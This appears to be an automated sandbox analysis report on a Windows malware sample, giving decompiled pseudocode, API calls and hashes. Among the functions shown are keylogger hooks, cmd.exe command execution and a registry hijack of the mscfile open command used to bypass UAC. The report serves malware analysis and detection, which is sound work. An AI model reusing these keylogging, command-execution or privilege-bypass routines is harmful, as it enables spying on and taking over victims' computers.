                              0x0043b969
                              0x0043b970
                              0x0043b977
                              0x0043b989
                              0x0043b990
                              0x0043b9af
                              0x0043b9bb
                              0x0043b9d6
                              0x0043b9d9
                              0x0043b9e0
                              0x0043b9e6
                              0x0043b9ed
                              0x0043b9f0
                              0x0043b9f2
                              0x0043b9f6
                              0x0043ba00
                              0x0043ba00
                              0x0043ba02
                              0x0043ba08
                              0x0043ba0b
                              0x0043ba0d
                              0x0043ba13
                              0x0043ba14
                              0x0043ba1a
                              0x00000000
                              0x00000000
                              0x00000000
                              0x00000000
                              0x0043b9f8
                              0x0043b9f8
                              0x0043b9f8
                              0x0043b9fb
                              0x0043b9fc
                              0x00000000
                              0x0043b9f8
                              0x0043b9e8
                              0x00000000
                              0x0043b9e8
                              0x0043b9c1
                              0x0043b9c6
                              0x0043b9c8
                              0x0043b9ca
                              0x00000000
                              0x0043b992
                              0x0043b992
                              0x0043b997
                              0x0043b999
                              0x0043b99a
                              0x0043b9cf
                              0x0043b9cf
                              0x0043ba1d
                              0x0043ba1e
                              0x00000000
                              0x0043ba27
                              0x0043b91e
                              0x0043b91e
                              0x0043b925
                              0x0043b926
                              0x0043b928
                              0x00000000
                              0x0043b92d

                              APIs
                              • GetModuleFileNameA.KERNEL32(00000000,C:\Windows\SysWOW64\mobsync.exe,00000104), ref: 0043B949
                              • _free.LIBCMT ref: 0043BA14
                              • _free.LIBCMT ref: 0043BA1E
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: _free$FileModuleName
                              • String ID: C:\Windows\SysWOW64\mobsync.exe
                              • API String ID: 2506810119-2325505231
                              • Opcode ID: ac7fa363a611d2fe180fa10b0f60eb66bb768e1b6c878b79d2cc510f2264fe88
                              • Instruction ID: 660ae339c78687f970f45cd6768a2251d83b04d254988ce5d7869c99c620db43
                              • Opcode Fuzzy Hash: ac7fa363a611d2fe180fa10b0f60eb66bb768e1b6c878b79d2cc510f2264fe88
                              • Instruction Fuzzy Hash: BD3173B1A01618AFDB21DF999881BAFBBA8EF89710F10506BE604D7311D7744E41CBD9
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00417868, Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 83COMMON
                              Download Yara Rule
                              APIs
                              • SystemParametersInfoW.USER32 ref: 0041795D
                                • Part of subcall function 00410497: RegCreateKeyA.ADVAPI32(80000001,00000000,00000000), ref: 004104A6
                                • Part of subcall function 00410497: RegSetValueExA.ADVAPI32(00000000,?,00000000,00000000,00000000,00000000,00000000,?,?,?,004106BD,?,00000000), ref: 004104CE
                                • Part of subcall function 00410497: RegCloseKey.ADVAPI32(00000000,?,?,?,004106BD,?,00000000), ref: 004104D9
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseCreateInfoParametersSystemValue
                              • String ID: Control Panel\Desktop$TileWallpaper$WallpaperStyle
                              • API String ID: 4127273184-3576401099
                              • Opcode ID: b7461f3b607af9112220d2a1ecb2e26f6984ed8fbbadff374e7df8a7d7c34c3d
                              • Instruction ID: fa13f98970d9a9ebbc3df1aa31e4731e3fb9772d8354761676ac4eeabfab18a3
                              • Opcode Fuzzy Hash: b7461f3b607af9112220d2a1ecb2e26f6984ed8fbbadff374e7df8a7d7c34c3d
                              • Instruction Fuzzy Hash: A5116332B8434072D818307A4E5FBAF18159746F61FA0416BB7013A6C6E8DF4A9943DF
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00409520, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 48COMMON
                              Download Yara Rule
                              C-Code - Quality: 82%
                              			E00409520(void* __ebx, struct HHOOK__** __ecx) {
				char _v28;
				void* __edi;
				struct HHOOK__** _t29;
				void* _t30;
				void* _t31;

				_t19 = __ebx;
				_t29 = __ecx;
				_t35 =  *((char*)(__ecx + 0x4a));
				if( *((char*)(__ecx + 0x4a)) == 0) {
					__eflags = 0;
					return 0;
				}
				_t28 = "Online Keylogger Stopped";
				E00402064(__ebx,  &_v28, "Online Keylogger Stopped");
				_t31 = _t30 - 0x18;
				L00416C32(_t31,  &_v28);
				E00409636(__ebx, _t29, _t35);
				L00401FA7();
				_t32 = _t31 - 0x18;
				E00402064(__ebx, _t31 - 0x18, "Online Keylogger Stopped");
				E00402064(_t19, _t32 - 0x18, "[Info]");
				E004165D8(_t19, _t28);
				_t29[0x12] = 0;
				CloseHandle(_t29[0xf]);
				if(_t29[0x12] == 0 &&  *_t29 != 0) {
					UnhookWindowsHookEx( *_t29);
					 *_t29 =  *_t29 & 0x00000000;
				}
				return 1;
			}








                              0x00409520
                              0x00409527
                              0x0040952a
                              0x0040952e
                              0x004095a3
                              0x00000000
                              0x004095a3
                              0x00409530
                              0x00409539
                              0x0040953e
                              0x00409546
                              0x0040954d
                              0x00409555
                              0x0040955a
                              0x00409560
                              0x0040956f
                              0x00409574
                              0x0040957c
                              0x00409583
                              0x0040958d
                              0x00409596
                              0x0040959c
                              0x0040959c
                              0x00000000

                              APIs
                                • Part of subcall function 00409636: GetLocalTime.KERNEL32(?,Offline Keylogger Started,0046C350), ref: 00409644
                                • Part of subcall function 00409636: wsprintfW.USER32 ref: 004096C5
                                • Part of subcall function 00409636: SetEvent.KERNEL32(00000000,00000000), ref: 004096EF
                                • Part of subcall function 004165D8: GetLocalTime.KERNEL32(00000000), ref: 004165F2
                              • CloseHandle.KERNEL32(?), ref: 00409583
                              • UnhookWindowsHookEx.USER32 ref: 00409596
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: LocalTime$CloseEventHandleHookUnhookWindowswsprintf
                              • String ID: Online Keylogger Stopped$[Info]
                              • API String ID: 3650414481-1913360614
                              • Opcode ID: ada38bd6edb72fe06451044f8e9b4cbe2534bfe623f07798f9bcbe28b6d4ccff
                              • Instruction ID: 5d632db0778c86123480600154419b6f65a677741df4c82794f5c8cb08535fc7
                              • Opcode Fuzzy Hash: ada38bd6edb72fe06451044f8e9b4cbe2534bfe623f07798f9bcbe28b6d4ccff
                              • Instruction Fuzzy Hash: 4E01D631A003006BD7257735C90B77E7B615B41305F80006EE941221D3DA7D5D59C3DA
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040C42E, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 45COMMON
                              Download Yara Rule
                              APIs
                              • __CxxThrowException@8.LIBVCRUNTIME ref: 0040C49C
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: Exception@8Throw
                              • String ID: ios_base::badbit set$ios_base::eofbit set$ios_base::failbit set
                              • API String ID: 2005118841-1866435925
                              • Opcode ID: 98616e623548769fb7f005e0eb1bacf97add9d4963ca9720668ea2437677b4ea
                              • Instruction ID: 00d2e120a14ed07e696206c725bb703fde342002c12277e6dbbb730505fe52c1
                              • Opcode Fuzzy Hash: 98616e623548769fb7f005e0eb1bacf97add9d4963ca9720668ea2437677b4ea
                              • Instruction Fuzzy Hash: 0001D671580208FAD710EB51C8E3F7E7358AF14705F20826FB915791C3EA7C6542866F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00412092, Relevance: 7.0, APIs: 1, Strings: 3, Instructions: 42COMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00412092(void* __edx, void* __ebp, void* __eflags, char _a16, char _a60, void* _a92, char _a96, void* _a128, void* _a152) {
				void* _t11;

				_t41 = __eflags;
				_t11 = E0040425F(0,  &_a96, L00401F75(L00401E29( &_a16, __edx, __eflags, 0)));
				_t35 = L"/C ";
				ShellExecuteW(0, L"open", L"cmd.exe", L00401ECB(E004043E5(0,  &_a60, L"/C ", _t41, _t11)), 0, 0);
				L00401ED0();
				L00401ED0();
				L00401E54( &_a16, _t35);
				L00401FA7();
				L00401FA7();
				return 0;
			}




                              0x00412092
                              0x004120ac
                              0x004120b2
                              0x004120d4
                              0x004120de
                              0x00412b2a
                              0x00412d65
                              0x00412d71
                              0x00412d7d
                              0x00412d8a

                              APIs
                              • ShellExecuteW.SHELL32(00000000,open,cmd.exe,00000000,00000000,00000000), ref: 004120D4
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: ExecuteShell
                              • String ID: /C $cmd.exe$open
                              • API String ID: 587946157-3896048727
                              • Opcode ID: 803bcdf3b0edb3cc88fca4fdd105ec4585c69fe00d7fe33e7cd188b72e3b8fd6
                              • Instruction ID: c2a54c5d25423007233d6e2fd92019bc1db18d9fdb92d93029f1e952cb8c39d0
                              • Opcode Fuzzy Hash: 803bcdf3b0edb3cc88fca4fdd105ec4585c69fe00d7fe33e7cd188b72e3b8fd6
                              • Instruction Fuzzy Hash: AEF036712083415BC214FB72DC92DAF7398AF90349F50183FB546A21F2EF7C9919865A
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041033E, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40registryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 63%
                              			E0041033E(void* __ecx) {
				void* _v8;
				int _v12;
				char _v2060;
				void* _t17;
				void* _t21;

				_v12 = 0x400;
				_t21 = __ecx;
				if(RegOpenKeyExW(0x80000000, L"http\\shell\\open\\command", 0, 0x20019,  &_v8) != 0) {
					_push(0x45f714);
				} else {
					RegQueryValueExW(_v8, 0, 0, 0,  &_v2060,  &_v12);
					RegCloseKey(_v8);
					_push( &_v2060);
				}
				E0040425F(_t17, _t21);
				return _t21;
			}








                              0x0041034c
                              0x0041035b
                              0x00410370
                              0x0041039b
                              0x00410372
                              0x00410383
                              0x0041038c
                              0x00410398
                              0x00410398
                              0x004103a2
                              0x004103ae

                              APIs
                              • RegOpenKeyExW.ADVAPI32(80000000,http\shell\open\command,00000000,00020019,00000000,0046C578,?), ref: 00410368
                              • RegQueryValueExW.ADVAPI32(00000000,00000000,00000000,00000000,?,00000400), ref: 00410383
                              • RegCloseKey.ADVAPI32(00000000), ref: 0041038C
                              Strings
                              • http\shell\open\command, xrefs: 0041035E
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseOpenQueryValue
                              • String ID: http\shell\open\command
                              • API String ID: 3677997916-1487954565
                              • Opcode ID: b49ceec60dfc3fce62ad31f5d248fca9093cf6a4bcf6e207aa74a06b3a315b32
                              • Instruction ID: 174bb4f21a826f001835e6ed766069888861b3d143c64ebc0b38a31aaf37e10a
                              • Opcode Fuzzy Hash: b49ceec60dfc3fce62ad31f5d248fca9093cf6a4bcf6e207aa74a06b3a315b32
                              • Instruction Fuzzy Hash: 49F0C87150020CFBDB109A95EC09FDFBBBCEB85B02F1000A6B905E2050DA705A8587A8
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0041053C, Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 39registryCOMMON
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E0041053C(void* __ecx, short* __edx, short* _a4, char _a8, int _a32) {
				void* _v8;
				signed int _t17;
				long _t20;
				signed int _t22;
				signed int _t23;

				_push(__ecx);
				_push(_t22);
				if(RegCreateKeyW(__ecx, __edx,  &_v8) != 0) {
					_t23 = 0;
				} else {
					_t17 = E00402469();
					_t20 = RegSetValueExW(_v8, _a4, 0, _a32, L00401ECB( &_a8), 2 + _t17 * 2);
					RegCloseKey(_v8);
					_t23 = _t22 & 0xffffff00 | _t20 == 0x00000000;
				}
				L00401ED0();
				return _t23;
			}








                              0x0041053f
                              0x00410540
                              0x0041054f
                              0x0041058f
                              0x00410551
                              0x00410555
                              0x00410576
                              0x00410581
                              0x0041058a
                              0x0041058a
                              0x00410594
                              0x0041059f

                              APIs
                              • RegCreateKeyW.ADVAPI32(80000001,Software\Classes\mscfile\shell\open\command,0046BB08), ref: 00410547
                              • RegSetValueExW.ADVAPI32(0046BB08,0045F714,00000000,00000000,00000000,00000000,0045F714,?,80000001,?,00405FD3,0045F714,0046BB08), ref: 00410576
                              • RegCloseKey.ADVAPI32(0046BB08,?,80000001,?,00405FD3,0045F714,0046BB08), ref: 00410581
                              Strings
                              • Software\Classes\mscfile\shell\open\command, xrefs: 00410545
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: CloseCreateValue
                              • String ID: Software\Classes\mscfile\shell\open\command
                              • API String ID: 1818849710-505396733
                              • Opcode ID: 5617ab08f8edb8971cfd4371ceae20215b39c424e0f6401640b29092af32c64f
                              • Instruction ID: b35e326baa4341fdc783df4f92487e38f7185df5fc588de708a2e43aa04f4aed
                              • Opcode Fuzzy Hash: 5617ab08f8edb8971cfd4371ceae20215b39c424e0f6401640b29092af32c64f
                              • Instruction Fuzzy Hash: B3F0A932400218BBCF109FA1ED0AEEE776CEB04782F00462ABD05A60A1EA759F14DB94
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00401397, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00401397() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(GetModuleHandleA("User32.dll"), "GetCursorInfo");
				 *0x46c5cc = _t2;
				return _t2;
			}




                              0x004013a8
                              0x004013ae
                              0x004013b3

                              APIs
                              • GetModuleHandleA.KERNEL32(User32.dll,GetCursorInfo), ref: 004013A1
                              • GetProcAddress.KERNEL32(00000000), ref: 004013A8
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: AddressHandleModuleProc
                              • String ID: GetCursorInfo$User32.dll
                              • API String ID: 1646373207-2714051624
                              • Opcode ID: e391e7f58ddd6f85363347764197a1ee543d9a7801bc0fe363ffb3f057bbb63e
                              • Instruction ID: d3bda5949b9d116e285d55fbc59b8e5d8e53a04c9e9cedd27b105f6a33248ad0
                              • Opcode Fuzzy Hash: e391e7f58ddd6f85363347764197a1ee543d9a7801bc0fe363ffb3f057bbb63e
                              • Instruction Fuzzy Hash: 31B092F1580B00AB87007FA0AC0D9193EA4F648743F2045BAF042929A1EBB891148F1F
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00401452, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E00401452() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("User32.dll"), "GetLastInputInfo");
				 *0x46ca68 = _t2;
				return _t2;
			}




                              0x00401463
                              0x00401469
                              0x0040146e

                              APIs
                              • LoadLibraryA.KERNEL32(User32.dll,GetLastInputInfo), ref: 0040145C
                              • GetProcAddress.KERNEL32(00000000), ref: 00401463
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetLastInputInfo$User32.dll
                              • API String ID: 2574300362-1519888992
                              • Opcode ID: c7935df8b6a38178698e2295717041de868490c523127cd3d72a117022a8c59f
                              • Instruction ID: a8f1c5a083774e383246da89c7c1d95a8e0abaf71fe038d6a5d2766fcd81b51d
                              • Opcode Fuzzy Hash: c7935df8b6a38178698e2295717041de868490c523127cd3d72a117022a8c59f
                              • Instruction Fuzzy Hash: 69B092F4641B00AB8700AFE0AC8DA053EA8A644B47F2002A3B09196961EBB88244CB1E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 0040146F, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 7libraryloaderCOMMON
                              Download Yara Rule
                              C-Code - Quality: 100%
                              			E0040146F() {
				_Unknown_base(*)()* _t2;

				_t2 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GetConsoleWindow");
				 *0x46ca6c = _t2;
				return _t2;
			}




                              0x00401480
                              0x00401486
                              0x0040148b

                              APIs
                              • LoadLibraryA.KERNEL32(kernel32.dll,GetConsoleWindow), ref: 00401479
                              • GetProcAddress.KERNEL32(00000000), ref: 00401480
                              Strings
                              Memory Dump Source
                              • Source File: 00000016.00000002.825096146.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                              • Associated: 00000016.00000002.825304751.000000000046F000.00000040.00000001.sdmp Download File
                              Yara matches
                              Similarity
                              • API ID: AddressLibraryLoadProc
                              • String ID: GetConsoleWindow$kernel32.dll
                              • API String ID: 2574300362-100875112
                              • Opcode ID: e3ac8940ee1cd37045cf06dacc4217d977a61d04c0bc9ee1a52c0efbbd79daa2
                              • Instruction ID: 5a97185418b63760bbf8986895f03466fab36a6e56cd4c50a02a3f426b50f970
                              • Opcode Fuzzy Hash: e3ac8940ee1cd37045cf06dacc4217d977a61d04c0bc9ee1a52c0efbbd79daa2
                              • Instruction Fuzzy Hash: C3B092B5681B00ABCA106FA2AD0DA0A3E68A604B43B1044A2F15582561EAB882048F1E
                              Uniqueness

                              Uniqueness Score: -1.00%

                              Function 00442490, Relevance: 6.3, APIs: 4, Instructions: 305COMMON
                              Download Yara Rule
                              C-Code - Quality: 75%
                              			E00442490(void* __edx, signed int* _a4, signed int _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, signed int _a24, signed int _a28, intOrPtr _a32, intOrPtr _a36) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				unsigned int _v20;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				char _v40;
				intOrPtr _v48;
				char _v52;
				void* __ebx;
				void* __edi;
				void* _t86;
				signed int _t92;
				signed int _t93;
				signed int _t94;
				signed int _t100;
				void* _t101;
				void* _t102;
				void* _t104;
				void* _t107;
				void* _t109;
				void* _t111;
				void* _t115;
				char* _t116;
				void* _t119;
				signed int _t121;
				signed int _t128;
				signed int* _t129;
				signed int _t136;
				signed int _t137;
				char _t138;
				signed int _t139;
				signed int _t142;
				signed int _t146;
				signed int _t151;
				char _t156;
				char _t157;
				void* _t161;
				unsigned int _t162;
				signed int _t164;
				signed int _t166;
				signed int _t170;
				void* _t171;
				signed int* _t172;
				signed int _t174;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				signed int _t184;
				signed int _t185;
				signed int _t186;
				signed int _t187;

				_t171 = __edx;
				_t181 = _a24;
				if(_t181 < 0) {
					_t181 = 0;
				}
				_t184 = _a8;
				 *_t184 = 0;
				L00434E17(0,  &_v52, _t171, _a36);
				_t5 = _t181 + 0xb; // 0xb
				if(_a12 > _t5) {
					_t172 = _a4;
					_t142 = _t172[1];
					_v36 =  *_t172;
					__eflags = (_t142 >> 0x00000014 & 0x000007ff) - 0x7ff;
					if((_t142 >> 0x00000014 & 0x000007ff) != 0x7ff) {
						L11:
						__eflags = _t142 & 0x80000000;
						if((_t142 & 0x80000000) != 0) {
							 *_t184 = 0x2d;
							_t184 = _t184 + 1;
							__eflags = _t184;
						}
						__eflags = _a28;
						_v16 = 0x3ff;
						_t136 = ((0 | _a28 == 0x00000000) - 0x00000001 & 0xffffffe0) + 0x27;
						__eflags = _t172[1] & 0x7ff00000;
						_v32 = _t136;
						_t86 = 0x30;
						if((_t172[1] & 0x7ff00000) != 0) {
							 *_t184 = 0x31;
							_t185 = _t184 + 1;
							__eflags = _t185;
						} else {
							 *_t184 = _t86;
							_t185 = _t184 + 1;
							_t164 =  *_t172 | _t172[1] & 0x000fffff;
							__eflags = _t164;
							if(_t164 != 0) {
								_v16 = 0x3fe;
							} else {
								_v16 = _v16 & _t164;
							}
						}
						_t146 = _t185;
						_t186 = _t185 + 1;
						_v28 = _t146;
						__eflags = _t181;
						if(_t181 != 0) {
							_t30 = _v48 + 0x88; // 0x74000000
							 *_t146 =  *((intOrPtr*)( *((intOrPtr*)( *_t30))));
						} else {
							 *_t146 = 0;
						}
						_t92 = _t172[1] & 0x000fffff;
						__eflags = _t92;
						_v20 = _t92;
						if(_t92 > 0) {
							L23:
							_t33 =  &_v8;
							 *_t33 = _v8 & 0x00000000;
							__eflags =  *_t33;
							_t147 = 0xf0000;
							_t93 = 0x30;
							_v12 = _t93;
							_v20 = 0xf0000;
							do {
								__eflags = _t181;
								if(_t181 <= 0) {
									break;
								}
								_t119 = E00450650( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
								_t161 = 0x30;
								_t121 = _t119 + _t161 & 0x0000ffff;
								__eflags = _t121 - 0x39;
								if(_t121 > 0x39) {
									_t121 = _t121 + _t136;
									__eflags = _t121;
								}
								_t162 = _v20;
								_t172 = _a4;
								 *_t186 = _t121;
								_t186 = _t186 + 1;
								_v8 = (_t162 << 0x00000020 | _v8) >> 4;
								_t147 = _t162 >> 4;
								_t93 = _v12 - 4;
								_t181 = _t181 - 1;
								_v20 = _t162 >> 4;
								_v12 = _t93;
								__eflags = _t93;
							} while (_t93 >= 0);
							__eflags = _t93;
							if(_t93 < 0) {
								goto L39;
							}
							_t115 = E00450650( *_t172 & _v8, _v12, _t172[1] & _t147 & 0x000fffff);
							__eflags = _t115 - 8;
							if(_t115 <= 8) {
								goto L39;
							}
							_t54 = _t186 - 1; // 0xff8bc35f
							_t116 = _t54;
							_t138 = 0x30;
							while(1) {
								_t156 =  *_t116;
								__eflags = _t156 - 0x66;
								if(_t156 == 0x66) {
									goto L33;
								}
								__eflags = _t156 - 0x46;
								if(_t156 != 0x46) {
									_t139 = _v32;
									__eflags = _t116 - _v28;
									if(_t116 == _v28) {
										_t57 = _t116 - 1;
										 *_t57 =  *(_t116 - 1) + 1;
										__eflags =  *_t57;
									} else {
										_t157 =  *_t116;
										__eflags = _t157 - 0x39;
										if(_t157 != 0x39) {
											 *_t116 = _t157 + 1;
										} else {
											 *_t116 = _t139 + 0x3a;
										}
									}
									goto L39;
								}
								L33:
								 *_t116 = _t138;
								_t116 = _t116 - 1;
							}
						} else {
							__eflags =  *_t172;
							if( *_t172 <= 0) {
								L39:
								__eflags = _t181;
								if(_t181 > 0) {
									_push(_t181);
									_t111 = 0x30;
									_push(_t111);
									_push(_t186);
									E00431810(_t181);
									_t186 = _t186 + _t181;
									__eflags = _t186;
								}
								_t94 = _v28;
								__eflags =  *_t94;
								if( *_t94 == 0) {
									_t186 = _t94;
								}
								__eflags = _a28;
								 *_t186 = ((_t94 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								_t174 = _a4[1];
								_t100 = E00450650( *_a4, 0x34, _t174);
								_t137 = 0;
								_t151 = (_t100 & 0x000007ff) - _v16;
								__eflags = _t151;
								asm("sbb ebx, ebx");
								if(__eflags < 0) {
									L47:
									 *(_t186 + 1) = 0x2d;
									_t187 = _t186 + 2;
									__eflags = _t187;
									_t151 =  ~_t151;
									asm("adc ebx, 0x0");
									_t137 =  ~_t137;
									goto L48;
								} else {
									if(__eflags > 0) {
										L46:
										 *(_t186 + 1) = 0x2b;
										_t187 = _t186 + 2;
										L48:
										_t182 = _t187;
										_t101 = 0x30;
										 *_t187 = _t101;
										__eflags = _t137;
										if(__eflags < 0) {
											L56:
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L60:
												_push(0);
												_push(0xa);
												_push(_t137);
												_push(_t151);
												_t102 = E00450350();
												_v32 = _t174;
												 *_t187 = _t102 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												L61:
												_t104 = 0x30;
												_t183 = 0;
												__eflags = 0;
												 *_t187 = _t151 + _t104;
												 *(_t187 + 1) = 0;
												goto L62;
											}
											__eflags = _t137;
											if(__eflags < 0) {
												goto L61;
											}
											if(__eflags > 0) {
												goto L60;
											}
											__eflags = _t151 - 0xa;
											if(_t151 < 0xa) {
												goto L61;
											}
											goto L60;
										}
										if(__eflags > 0) {
											L51:
											_push(0);
											_push(0x3e8);
											_push(_t137);
											_push(_t151);
											_t107 = E00450350();
											_v32 = _t174;
											 *_t187 = _t107 + 0x30;
											_t187 = _t187 + 1;
											__eflags = _t187 - _t182;
											if(_t187 != _t182) {
												L55:
												_push(0);
												_push(0x64);
												_push(_t137);
												_push(_t151);
												_t109 = E00450350();
												_v32 = _t174;
												 *_t187 = _t109 + 0x30;
												_t187 = _t187 + 1;
												__eflags = _t187;
												goto L56;
											}
											L52:
											__eflags = _t137;
											if(__eflags < 0) {
												goto L56;
											}
											if(__eflags > 0) {
												goto L55;
											}
											__eflags = _t151 - 0x64;
											if(_t151 < 0x64) {
												goto L56;
											}
											goto L55;
										}
										__eflags = _t151 - 0x3e8;
										if(_t151 < 0x3e8) {
											goto L52;
										}
										goto L51;
									}
									__eflags = _t151;
									if(_t151 < 0) {
										goto L47;
									}
									goto L46;
								}
							}
							goto L23;
						}
					}
					__eflags = 0;
					if(0 != 0) {
						goto L11;
					} else {
						_t183 = E00442793(0, _t142, 0, _t172, _t184, _a12, _a16, _a20, _t181, 0, _a32, 0);
						__eflags = _t183;
						if(_t183 == 0) {
							_t128 = E00450730(_t184, 0x65);
							_pop(_t166);
							__eflags = _t128;
							if(_t128 != 0) {
								__eflags = _a28;
								_t170 = ((_t166 & 0xffffff00 | _a28 == 0x00000000) - 0x00000001 & 0x000000e0) + 0x70;
								__eflags = _t170;
								 *_t128 = _t170;
								 *((char*)(_t128 + 3)) = 0;
							}
							_t183 = 0;
						} else {
							 *_t184 = 0;
						}
						goto L62;
					}
				} else {
					_t129 = L00439E14();
					_t183 = 0x22;
					 *_t129 = _t183;
					E0043626D();
					L62:
					if(_v40 != 0) {
						 *(_v52 + 0x350) =  *(_v52 + 0x350) & 0xfffffffd;
					}
					return _t183;
				}
			}
























































                              0x00442490
                              0x0044249b
                              0x004424a2
                              0x004424a4
                              0x004424a4
                              0x004424a6
                              0x004424af
                              0x004424b1
                              0x004424b6
                              0x004424bc
                              0x004424d2
                              0x004424d7
                              0x004424da
                              0x004424e7
                              0x004424ec
                              0x00442540
                              0x00442548
                              0x0044254a
                              0x0044254c
                              0x0044254f
                              0x0044254f
                              0x0044254f
                              0x00442555
                              0x0044255d
                              0x00442570
                              0x00442573
                              0x00442575
                              0x00442578
                              0x00442579
                              0x0044259a
                              0x0044259d
                              0x0044259d
                              0x0044257b
                              0x0044257b
                              0x0044257d
                              0x00442588
                              0x00442588
                              0x0044258a
                              0x00442591
                              0x0044258c
                              0x0044258c
                              0x0044258c
                              0x0044258a
                              0x0044259e
                              0x004425a0
                              0x004425a1
                              0x004425a4
                              0x004425a6
                              0x004425b0
                              0x004425ba
                              0x004425a8
                              0x004425a8
                              0x004425a8
                              0x004425bf
                              0x004425bf
                              0x004425c4
                              0x004425c7
                              0x004425d2
                              0x004425d2
                              0x004425d2
                              0x004425d2
                              0x004425d6
                              0x004425dd
                              0x004425de
                              0x004425e1
                              0x004425e4
                              0x004425e4
                              0x004425e6
                              0x00000000
                              0x00000000
                              0x004425fe
                              0x00442605
                              0x00442609
                              0x0044260c
                              0x0044260f
                              0x00442611
                              0x00442611
                              0x00442611
                              0x00442613
                              0x00442616
                              0x00442619
                              0x0044261b
                              0x00442623
                              0x00442629
                              0x0044262c
                              0x0044262f
                              0x00442630
                              0x00442633
                              0x00442636
                              0x00442636
                              0x0044263b
                              0x0044263e
                              0x00000000
                              0x00000000
                              0x00442656
                              0x0044265b
                              0x0044265f
                              0x00000000
                              0x00000000
                              0x00442663
                              0x00442663
                              0x00442666
                              0x00442667
                              0x00442667
                              0x00442669
                              0x0044266c
                              0x00000000
                              0x00000000
                              0x0044266e
                              0x00442671
                              0x00442678
                              0x0044267b
                              0x0044267e
                              0x00442694
                              0x00442694
                              0x00442694
                              0x00442680
                              0x00442680
                              0x00442682
                              0x00442685
                              0x00442690
                              0x00442687
                              0x0044268a
                              0x0044268a
                              0x00442685
                              0x00000000
                              0x0044267e
                              0x00442673
                              0x00442673
                              0x00442675
                              0x00442675
                              0x004425c9
                              0x004425c9
                              0x004425cc
                              0x00442697
                              0x00442697
                              0x00442699
                              0x0044269b
                              0x0044269e
                              0x0044269f
                              0x004426a0
                              0x004426a1
                              0x004426a9
                              0x004426a9
                              0x004426a9
                              0x004426ab
                              0x004426ae
                              0x004426b1
                              0x004426b3
                              0x004426b3
                              0x004426b5
                              0x004426c7
                              0x004426cb
                              0x004426ce
                              0x004426d5
                              0x004426dd
                              0x004426dd
                              0x004426e0
                              0x004426e2
                              0x004426f3
                              0x004426f3
                              0x004426f7
